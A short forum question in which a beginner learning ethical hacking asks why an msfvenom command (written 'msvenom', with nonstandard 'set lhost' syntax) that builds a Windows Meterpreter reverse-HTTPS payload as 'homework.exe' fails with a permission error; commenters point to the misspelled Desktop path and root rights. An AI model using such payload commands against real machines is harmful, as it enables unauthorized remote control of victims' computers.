# Bash error on Linux Mint when I try to use Meterpreter on terminal

Tags: linux, bash, terminal, linux-mint

I am pretty new in the programming. I have done some projects but not that professional. Now I am started ethical hacking lessons from the Internet. There are too many of them. People call this as "Meterpreter".

```
msvenom -p windows/meterpreter/reverse_https set lhost=192.168.1.44 set lport=4444 -f exe > /root/Dektop/homework.exe
bash: /root/Dektop/homework.exe: Permission denied
```

I searched on internet and the use say `chmod` command but I didn't even created a file?

I can't create any files too. In general folder it wants me to write password.

What do I must do?

Comment: You need to spell `Desktop` correctly. You need to be root, too, if you're going to write anywhere underneath `/root`

Comment: Oh thank you it worked.